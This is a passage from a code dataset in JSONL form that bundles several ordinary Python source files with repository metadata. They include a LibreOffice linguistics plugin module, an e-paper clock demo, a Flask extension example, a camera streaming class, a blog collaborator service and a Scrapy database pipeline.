args=refTextRough))\n logger.debug(\"%d examples\", len(self.examplesDict))\n refnum = refTextRough.strip()\n if refnum.startswith(\"#\"):\n refnum = refnum[1:] # keep all but first character\n\n ## Select the specified ref number\n\n refnum_key = refnum.lower() # case insensitive\n if refnum_key in self.examplesDict:\n logger.debug(\n \"Inserting '%s'\", self.examplesDict[refnum_key].refText)\n\n ## Display the data in the Writer doc\n\n if updatingEx:\n self.exUpdater.gotoAfterEx()\n self.outputManager.setConfig(self.settings.getOutconfig())\n self.outputManager.outputExample(\n self.examplesDict[refnum_key], deleteRefNum, updatingEx)\n else:\n message = exceptions.interpolate_message(\n \"Could not find ref number %s\", [refnum])\n raise exceptions.DataNotFoundError(\n self.appendSuggestions(message))\n\n def appendSuggestions(self, message):\n \"\"\"Append suggestion ref numbers to a message.\n\n :param message: the main part of the message\n :returns: the localized message string with suggestions added\n \"\"\"\n if not self.suggestions:\n return message\n suggNum = 0\n suggString = \"\"\n MAX_SUGGESTIONS = 3\n for suggestion in self.suggestions:\n suggNum += 1\n if suggNum > MAX_SUGGESTIONS:\n break\n suggString += \"\\t%s\\n\" % suggestion\n suggestion_message = exceptions.interpolate_message(\n \"\\n\\nSuggestions\\n%s\", [suggString])\n return message + suggestion_message\n\n def updateEx(self, refTextRough):\n \"\"\"This method gets called after a ref number to update has been\n selected in the document. The order of the next few steps is:\n 1. Call gotoAfterEx() to move out of the table.\n 2. Insert the new example without the example number.\n 3. Call moveExNumber().\n Steps 1 and 2 are done in insertEx().\n \"\"\"\n logger.debug(util.funcName('begin'))\n if self.exType == EXTYPE_INTERLINEAR:\n if not self.search.refInTable():\n raise exceptions.RangeError(\n \"Found a ref number, but it must be in an outer \"\n \"table in order to be updated.\")\n self.insertEx(refTextRough, False, True)\n if self.exType == EXTYPE_INTERLINEAR:\n if not self.settings.showCompDoc():\n self.exUpdater.doNotMakeCompDoc()\n self.exUpdater.moveExNumber()\n self.exUpdater.moveExamplesToNewDoc()\n else:\n self.exUpdater.deleteOldPhonEx()\n\n\nclass ExSettings:\n \"\"\"Phonology or interlinear settings from user vars. Loads on demand.\"\"\"\n def __init__(self, exType, unoObjs, userVars):\n self.exType = exType\n self.unoObjs = unoObjs\n self.userVars = userVars\n self.msgbox = MessageBox(unoObjs)\n self.styles = None\n self.inSettings = None\n self.outSettings = None\n self.showComparisonDoc = None\n self.fileList = []\n\n def getStyles(self):\n if not self.styles:\n if self.exType == EXTYPE_PHONOLOGY:\n self.styles = styles.PhonologyStyles(\n self.unoObjs, self.userVars)\n else:\n self.styles = styles.InterlinStyles(\n self.unoObjs, self.userVars)\n return self.styles\n\n def getInconfig(self):\n self._loadSettings()\n return self.inSettings\n\n def getOutconfig(self):\n self._loadSettings()\n return self.outSettings\n\n def showCompDoc(self):\n if self.showComparisonDoc is None:\n self.showComparisonDoc = True\n varname = \"ComparisonDoc\"\n if not self.userVars.isEmpty(varname):\n if self.userVars.getInt(varname) == 0:\n self.showComparisonDoc = False\n return self.showComparisonDoc\n\n def reset(self):\n \"\"\"Call this to allow settings to be reloaded.\"\"\"\n self.inSettings = None\n self.outSettings = None\n\n def _loadSettings(self):\n if self.outSettings:\n return\n if self.exType == EXTYPE_PHONOLOGY:\n self._getPhonologySettings()\n else:\n self._getInterlinSettings()\n\n def _getPhonologySettings(self):\n \"\"\"Get file paths, style names, and other options that were\n set in the Phonology Settings dialog.\n \"\"\"\n logger.debug(util.funcName('begin'))\n self.inSettings = lingex_structs.PhonInputSettings(self.userVars)\n self.inSettings.loadUserVars()\n self.outSettings = lingex_structs.PhonOutputSettings(self.userVars)\n self.outSettings.loadUserVars()\n logger.debug(util.funcName('end'))\n\n def _getInterlinSettings(self):\n \"\"\"Get file paths, style names, and other options from user vars.\"\"\"\n logger.debug(util.funcName('begin'))\n self.outSettings = lingex_structs.InterlinOutputSettings(self.userVars)\n self.outSettings.loadUserVars()\n self.inSettings = fileitemlist.InterlinInputSettings(self.userVars)\n self.inSettings.loadUserVars()\n self.inSettings.loadOutputSettings(self.outSettings)\n logger.debug(\"Using %d file(s).\", len(self.inSettings.fileList))\n logger.debug(util.funcName('end'))\n", "repo_name": "silnrsi/libreoffice-linguistic-tools", "sub_path": "LinguisticTools/pythonpath/lingt/app/svc/lingexamples.py", "file_name": "lingexamples.py", "file_ext": "py", "file_size_in_byte": 17097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "88", "api": [{"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "lingt.access.writer.uservars.Prefix.PHONOLOGY", "line_number": 39, "usage_type": "attribute"}, {"api_name": "lingt.access.writer.uservars.Prefix", "line_number": 39, "usage_type": "name"}, {"api_name": "lingt.access.writer.uservars.Prefix.INTERLINEAR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "lingt.access.writer.uservars.Prefix", "line_number": 41, "usage_type": "name"}, {"api_name": "lingt.access.writer.uservars.UserVars", "line_number": 42, "usage_type": "call"}, {"api_name": "lingt.ui.common.messagebox.MessageBox", "line_number": 44, "usage_type": "call"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 55, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 55, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataNotFoundError", "line_number": 57, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 57, "usage_type": "name"}, {"api_name": "lingt.utils.util.natural_sort", "line_number": 60, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 60, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 65, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 65, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 68, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 68, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataInconsistentError", "line_number": 72, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 72, "usage_type": "name"}, {"api_name": "lingt.utils.util.natural_sort", "line_number": 80, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 80, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 82, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 82, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataNotFoundError", "line_number": 84, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 84, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 90, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 90, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.ChoiceProblem", "line_number": 92, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 92, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 96, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 96, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 117, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 117, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 134, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 134, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 152, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 152, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.UserInterrupt", "line_number": 185, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 185, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.MessageError", "line_number": 187, "usage_type": "attribute"}, {"api_name": "lingt.app.exceptions", "line_number": 187, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.UserInterrupt", "line_number": 225, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 225, "usage_type": "name"}, {"api_name": "lingt.access.writer.search.ExampleSearch", "line_number": 237, "usage_type": "call"}, {"api_name": "lingt.access.writer.search", "line_number": 237, "usage_type": "name"}, {"api_name": "lingt.access.writer.outputmanager.PhonMgr", "line_number": 240, "usage_type": "call"}, {"api_name": "lingt.access.writer.outputmanager", "line_number": 240, "usage_type": "name"}, {"api_name": "lingt.access.writer.outputmanager.InterlinMgr", "line_number": 243, "usage_type": "call"}, {"api_name": "lingt.access.writer.outputmanager", "line_number": 243, "usage_type": "name"}, {"api_name": "lingt.access.writer.ex_updater.ExUpdater", "line_number": 246, "usage_type": "call"}, {"api_name": "lingt.ui.common.messagebox.MessageBox", "line_number": 248, "usage_type": "call"}, {"api_name": "lingt.access.xml.phon_reader.PhonReader", "line_number": 277, "usage_type": "call"}, {"api_name": "lingt.access.xml.interlin_reader.InterlinReader", "line_number": 280, "usage_type": "call"}, {"api_name": "lingt.utils.util.funcName", "line_number": 288, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 288, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 309, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 309, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.DataNotFoundError", "line_number": 311, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 311, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.interpolate_message", "line_number": 330, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 330, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 342, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 342, "usage_type": "name"}, {"api_name": "lingt.app.exceptions.RangeError", "line_number": 345, "usage_type": "call"}, {"api_name": "lingt.app.exceptions", "line_number": 345, "usage_type": "name"}, {"api_name": "lingt.ui.common.messagebox.MessageBox", "line_number": 364, "usage_type": "call"}, {"api_name": "lingt.access.writer.styles.PhonologyStyles", "line_number": 374, "usage_type": "call"}, {"api_name": "lingt.access.writer.styles", "line_number": 374, "usage_type": "name"}, {"api_name": "lingt.access.writer.styles.InterlinStyles", "line_number": 377, "usage_type": "call"}, {"api_name": "lingt.access.writer.styles", "line_number": 377, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 415, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 415, "usage_type": "name"}, {"api_name": "lingt.app.data.lingex_structs.PhonInputSettings", "line_number": 416, "usage_type": "call"}, {"api_name": "lingt.app.data.lingex_structs", "line_number": 416, "usage_type": "name"}, {"api_name": "lingt.app.data.lingex_structs.PhonOutputSettings", "line_number": 418, "usage_type": "call"}, {"api_name": "lingt.app.data.lingex_structs", "line_number": 418, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 420, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 420, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 424, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 424, "usage_type": "name"}, {"api_name": "lingt.app.data.lingex_structs.InterlinOutputSettings", "line_number": 425, "usage_type": "call"}, {"api_name": "lingt.app.data.lingex_structs", "line_number": 425, "usage_type": "name"}, {"api_name": "lingt.app.data.fileitemlist.InterlinInputSettings", "line_number": 427, "usage_type": "call"}, {"api_name": "lingt.app.data.fileitemlist", "line_number": 427, "usage_type": "name"}, {"api_name": "lingt.utils.util.funcName", "line_number": 431, "usage_type": "call"}, {"api_name": "lingt.utils.util", "line_number": 431, "usage_type": "name"}]} +{"seq_id": "4944133535", "text": "import sys\nimport os\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom datetime import datetime\nimport time\nfrom EPD import EPD\n\nWHITE = 1\nBLACK = 0\n\n# fonts are in different places on Raspbian/Angstrom so search\npossible_fonts = [\n '/usr/share/fonts/truetype/ttf-dejavu/DejaVuSansMono-Bold.ttf', # R.Pi\n '/usr/share/fonts/truetype/freefont/FreeMono.ttf', # R.Pi\n '/usr/share/fonts/truetype/LiberationMono-Bold.ttf', # B.B\n '/usr/share/fonts/truetype/DejaVuSansMono-Bold.ttf', # B.B\n '/usr/share/fonts/TTF/FreeMonoBold.ttf', # Arch\n '/usr/share/fonts/TTF/DejaVuSans-Bold.ttf' # Arch\n]\n\n\nFONT_FILE = ''\nfor f in possible_fonts:\n if os.path.exists(f):\n FONT_FILE = f\n break\n\nif '' == FONT_FILE:\n raise 'no font file found'\n\nCLOCK_FONT_SIZE = 40\nDATE_FONT_SIZE = 30\n\nMAX_START = 0xffff\n\ndef main(argv):\n \"\"\"main program - draw and display a test image\"\"\"\n\n epd = EPD()\n\n print('panel = {p:s} {w:d} x {h:d} version={v:s} COG={g:d} FILM={f:d}'.format(p=epd.panel, w=epd.width, h=epd.height, v=epd.version, g=epd.cog, f=epd.film))\n\n epd.clear()\n\n demo(epd)\n\n\ndef demo(epd):\n \"\"\"simple partial update demo - draw draw a clock\"\"\"\n\n # initially set all white background\n image = Image.new('1', epd.size, WHITE)\n\n # prepare for drawing\n draw = ImageDraw.Draw(image)\n width, height = image.size\n\n clock_font = ImageFont.truetype(FONT_FILE, CLOCK_FONT_SIZE)\n date_font = ImageFont.truetype(FONT_FILE, DATE_FONT_SIZE)\n\n # clear the display buffer\n draw.rectangle((0, 0, width, height), fill=WHITE, outline=WHITE)\n previous_second = 0\n previous_day = 0\n\n while True:\n while True:\n now = datetime.today()\n if now.second % 5 == 0:\n break\n time.sleep(0.5)\n\n if now.day != previous_day:\n draw.rectangle((2, 2, width - 2, height - 2), fill=WHITE, outline=BLACK)\n draw.text((10, 55), '{y:04d}-{m:02d}-{d:02d}'.format(y=now.year, m=now.month, d=now.day), fill=BLACK, font=date_font)\n previous_day = now.day\n else:\n draw.rectangle((5, 10, width - 5, 10 + CLOCK_FONT_SIZE), fill=WHITE, outline=WHITE)\n\n draw.text((5, 10), '{h:02d}:{m:02d}:{s:02d}'.format(h=now.hour, m=now.minute, s=now.second), fill=BLACK, font=clock_font)\n\n # display image on the panel\n epd.display(image)\n if now.second < previous_second:\n epd.update() # full update every minute\n else:\n epd.partial_update()\n previous_second = now.second\n\n# main\nif \"__main__\" == __name__:\n if len(sys.argv) < 1:\n sys.exit('usage: {p:s}'.format(p=sys.argv[0]))\n\n try:\n main(sys.argv[1:])\n except KeyboardInterrupt:\n sys.exit('interrupted')\n pass\n", "repo_name": "repaper/gratis", "sub_path": "PlatformWithOS/demo/ClockDemo.py", "file_name": "ClockDemo.py", "file_ext": "py", "file_size_in_byte": 2909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 239, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "EPD.EPD", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 61, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 61, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "37309573311", "text": "from flask import Flask\nfrom flask_bismillah import Bismillah\n\napp = Flask(__name__)\n\nb = Bismillah()\nb.init_app(app)\n\n@app.route('/')\ndef bismillah():\n return \"Bismillah Project \" + b.print_me()\n\n\nif __name__ == '__main__':\n app.run()", "repo_name": "hmtmcse/flask-exp", "sub_path": "extension/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 241, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask_bismillah.Bismillah", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "30092047758", "text": "# Python-specific imports\nfrom imutils.video import VideoStream\n\nclass Camera:\n\n\t\"\"\"\n\t\turl: The camera url passed in\n\t\tROI: A list containing all of the coordinates of the Bounding Box.\n\t\tVS: A VideoStream object that streams from the camera url\n\t\tdimensions: A list containing the width and height of each frame we would receive.\n\t\tprepare_ratio: A list containing the ratio of the original frame to the frame that's resized when the frame is preparing for it to be displayed.\n\t\tfrontend_ratio: A list containing the ratio of the original frame to the frame that's resized when the frame is displayed on the frontend.\n\t\tcar_count: number of cars that have passed by this camera\n\t\"\"\"\n\n\tdef __init__(self, url):\n\t\t\"\"\"\n\t\t\tBasic setup of the object, instanstiates url and starts a new video stream\n\t\t\"\"\"\n\t\tself.url = url\n\t\tself.ROI = None\n\t\tself.car_count = 0\n\t\t#self.frame_delay = 5\n\t\tself.initialize_video_stream(url)\n\n\tdef __iter__(self):\n\t\t\"\"\"\n\t\t\tOverwrites the default iter function so that you can iterate through this camera.\n\t\t\"\"\"\n\t\treturn CameraIterator(self)\n\n\tdef __repr__(self):\n\t\t\"\"\"\n\t\t\tString representation of the object.\n\t\t\"\"\"\n\t\treturn 'URL: {}, ROI: {}'.format(self.url,self.ROI)\n\n\tdef set_roi_coordinates(self, coordinates):\n\t\t\"\"\"\n\t\t\tUpdates Region of Interest(ROI) with the coordinates specified from the frontend.\n\t\t\"\"\"\n\t\tself.ROI = coordinates\n\n\tdef build_video_stream(self, camera_url):\n\t\t# Build Stream\n\t\tself.VS = VideoStream(src=camera_url).start()\n\t\tsample_frame = self.VS.read()\n\t\treturn sample_frame\n\n\tdef initialize_video_stream(self,camera_url):\n\t\t\"\"\"\n\t\t\tGiven a camera url, build a stream object and get the dimensions of it.\n\t\t\"\"\"\n\n\t\t# If we are not able to read a proper frame from the stream, this will fail.\n\t\tsample_frame = self.build_video_stream(camera_url)\n\t\tassert sample_frame is not None\n\n\t\t# Set the width and height.\n\t\tself.dimensions = sample_frame.shape\n\t\tself.prepare_ratio = [800/self.dimensions[0],1]\n\t\tself.frontend_ratio = [450/(self.dimensions[0]*self.prepare_ratio[0]),800/(self.dimensions[1]*self.prepare_ratio[1])]\n\n\tdef stop_video_stream(self):\n\t\t\"\"\"\n\t\t\tTurns off the Video Stream\n\t\t\"\"\"\n\t\tself.VS.stop()\n\nclass CameraIterator:\n\t\"\"\"\n\t\tThis object is created so that you can iterate through a camera object\n\t\"\"\"\n\n\tdef __init__(self, camera):\n\t\t\"\"\"\n\t\t\tBasic setup of iterator object.\n\t\t\"\"\"\n\t\tself.camera = camera\n\n\tdef __next__(self):\n\t\t\"\"\"\n\t\t\tAllows iterating over this object to get each frame. Ex: \"for frame in camera...\"\n\t\t\"\"\"\n\n\t\t# If we are not able to read a proper frame from the stream, this will fail.\n\t\tframe = self.camera.VS.read()\n\t\n\t\trestartCount = 0\n\t\twhile frame is None:\n\t\t\tif restartCount == 5:\n\t\t\t\traise Exception(\"Frame is None\")\n\t\t\tself.camera.initialize_video_stream(self.camera.url())\n\t\t\tframe = self.camera.VS.read()\n\t\t\trestartCount+=1\n\t\t\n\t\treturn frame\n\n\t\t\n\"\"\"\n\tTesting to check for how long it takes to run\n\"\"\"\nif __name__ == '__main__':\n\tsample = Camera(url = 0)\n\ti = 0\n\tfor frame in sample:\n\t\tif i > 3000:\n\t\t\tbreak\n\t\tprint(\"FROM CAMERA: \" + frame)\n\t\ti += 1\n", "repo_name": "delphidisplay/CameraBasedSensor-OLD", "sub_path": "camera.py", "file_name": "camera.py", "file_ext": "py", "file_size_in_byte": 3035, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "imutils.video.VideoStream", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "23111207242", "text": "from ..api.blog_collaborator import IBlogCollaboratorService\nfrom ally.container.ioc import injected\nfrom livedesk.meta.blog_collaborator import BlogCollaboratorMapped, \\\n BlogCollaboratorEntry\nfrom superdesk.person.meta.person import PersonMapped\nfrom superdesk.source.meta.source import SourceMapped\nfrom sqlalchemy.exc import OperationalError\nfrom ally.exception import InputError, Ref\nfrom ally.internationalization import _\nfrom ally.support.sqlalchemy.session import SessionSupport\nfrom ally.container.support import setup\nfrom sqlalchemy.orm.exc import NoResultFound\n\n# --------------------------------------------------------------------\n\n@injected\n@setup(IBlogCollaboratorService)\nclass BlogCollaboratorServiceAlchemy(SessionSupport, IBlogCollaboratorService):\n '''\n Implementation for @see: IBlogCollaboratorService\n '''\n\n def __init__(self):\n '''\n Construct the blog collaborator service.\n '''\n\n def getById(self, blogId, collaboratorId):\n '''\n @see: IBlogCollaboratorService.getById\n '''\n sql = self.session().query(BlogCollaboratorMapped)\n sql = sql.filter(BlogCollaboratorMapped.Blog == blogId)\n sql = sql.filter(BlogCollaboratorMapped.Id == collaboratorId)\n\n try: return sql.one()\n except NoResultFound: raise InputError(Ref(_('No collaborator'), ref=BlogCollaboratorMapped.Id))\n\n def getAll(self, blogId):\n '''\n @see: IBlogCollaboratorService.getAll\n '''\n sql = self.session().query(BlogCollaboratorMapped).filter(BlogCollaboratorMapped.Blog == blogId)\n sql = sql.join(PersonMapped).join(SourceMapped).order_by(BlogCollaboratorMapped.Name)\n return sql.all()\n\n def addCollaborator(self, blogId, collaboratorId):\n '''\n @see: IBlogCollaboratorService.addCollaborator\n '''\n sql = self.session().query(BlogCollaboratorEntry)\n sql = sql.filter(BlogCollaboratorEntry.Blog == blogId)\n sql = sql.filter(BlogCollaboratorEntry.blogCollaboratorId == collaboratorId)\n if sql.count() > 0: raise InputError(_('Already a collaborator for this blog'))\n\n bgc = BlogCollaboratorEntry()\n bgc.Blog = blogId\n bgc.blogCollaboratorId = collaboratorId\n self.session().add(bgc)\n self.session().flush((bgc,))\n return bgc.blogCollaboratorId\n\n def removeCollaborator(self, blogId, collaboratorId):\n '''\n @see: IBlogCollaboratorService.removeCollaborator\n '''\n try:\n sql = self.session().query(BlogCollaboratorEntry)\n sql = sql.filter(BlogCollaboratorEntry.Blog == blogId)\n sql = sql.filter(BlogCollaboratorEntry.blogCollaboratorId == collaboratorId)\n return sql.delete() > 0\n except OperationalError:\n raise InputError(Ref(_('Cannot remove'), model=BlogCollaboratorMapped))\n", "repo_name": "poderomedia/Superdesk", "sub_path": "plugins/livedesk/livedesk/impl/blog_collaborator.py", "file_name": "blog_collaborator.py", "file_ext": "py", "file_size_in_byte": 2888, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "86", "api": [{"api_name": "ally.support.sqlalchemy.session.SessionSupport", "line_number": 18, "usage_type": "name"}, {"api_name": "api.blog_collaborator.IBlogCollaboratorService", "line_number": 18, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 32, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Blog", "line_number": 33, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 33, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Id", "line_number": 34, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.exc.NoResultFound", "line_number": 37, "usage_type": "name"}, {"api_name": "ally.exception.InputError", "line_number": 37, "usage_type": "call"}, {"api_name": "ally.exception.Ref", "line_number": 37, "usage_type": "call"}, {"api_name": "ally.internationalization._", "line_number": 37, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Id", "line_number": 37, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 37, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 43, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Blog", "line_number": 43, "usage_type": "attribute"}, {"api_name": "superdesk.source.meta.source.SourceMapped", "line_number": 44, "usage_type": "argument"}, {"api_name": "superdesk.person.meta.person.PersonMapped", "line_number": 44, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Name", "line_number": 44, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 44, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 51, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.Blog", "line_number": 52, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 52, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.blogCollaboratorId", "line_number": 53, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 53, "usage_type": "name"}, {"api_name": "ally.exception.InputError", "line_number": 54, "usage_type": "call"}, {"api_name": "ally.internationalization._", "line_number": 54, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 56, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 68, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.Blog", "line_number": 69, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 69, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.blogCollaboratorId", "line_number": 70, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 72, "usage_type": "name"}, {"api_name": "ally.exception.InputError", "line_number": 73, "usage_type": "call"}, {"api_name": "ally.exception.Ref", "line_number": 73, "usage_type": "call"}, {"api_name": "ally.internationalization._", "line_number": 73, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 73, "usage_type": "name"}, {"api_name": "ally.container.ioc.injected", "line_number": 16, "usage_type": "name"}, {"api_name": "ally.container.support.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "api.blog_collaborator.IBlogCollaboratorService", "line_number": 17, "usage_type": "argument"}]} +{"seq_id": "11572083769", "text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n# Sqlalchemy docs: https://docs.sqlalchemy.org/en/latest/\nimport os\nimport logging\nfrom sqlalchemy import (\n create_engine,\n Table,\n Column,\n MetaData,\n Integer,\n Text,\n select\n)\nfrom scrapy.exceptions import DropItem\nfrom database.settings import session, engine\nfrom database.model import NewsItem\n\nlogger = logging.getLogger(__name__)\n\nclass CrawlerPipeline(object):\n\n def __init__(self):\n self.connection = engine.connect()\n\n def process_item(self, item, spider):\n \"\"\"Save items in the database.\n \"\"\"\n newsitem = NewsItem(**item)\n news_in_db = session.query(NewsItem).filter_by(url = newsitem.url).first()\n if(news_in_db is None):\n try:\n session.add(newsitem)\n session.commit()\n except Exception as e:\n session.rollback()\n raise e\n finally:\n session.close()\n else:\n newsitem.update()\n logger.info(\"<----------------ALREADY IN------------------>\")\n logger.info(news_in_db.title)\n logger.info(\"<-------------------------------------------->\")\n return item\n", "repo_name": "hdkhanhkhtn/news-crawler", "sub_path": "crawler/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 1386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "database.settings.engine.connect", "line_number": 28, "usage_type": "call"}, {"api_name": "database.settings.engine", "line_number": 28, "usage_type": "name"}, {"api_name": "database.model.NewsItem", "line_number": 33, "usage_type": "call"}, {"api_name": "database.settings.session.query", "line_number": 34, "usage_type": "call"}, {"api_name": "database.model.NewsItem", "line_number": 34, "usage_type": "argument"}, {"api_name": "database.settings.session", "line_number": 34, "usage_type": "name"}, {"api_name": "database.settings.session.add", "line_number": 37, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 37, "usage_type": "name"}, {"api_name": "database.settings.session.commit", "line_number": 38, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 38, "usage_type": "name"}, {"api_name": "database.settings.session.rollback", "line_number": 40, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 40, "usage_type": "name"}, {"api_name": "database.settings.session.close", "line_number": 43, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "27231501785", "text": "# Create your views here.\r\nfrom django.http import JsonResponse\r\nfrom django.views.generic import 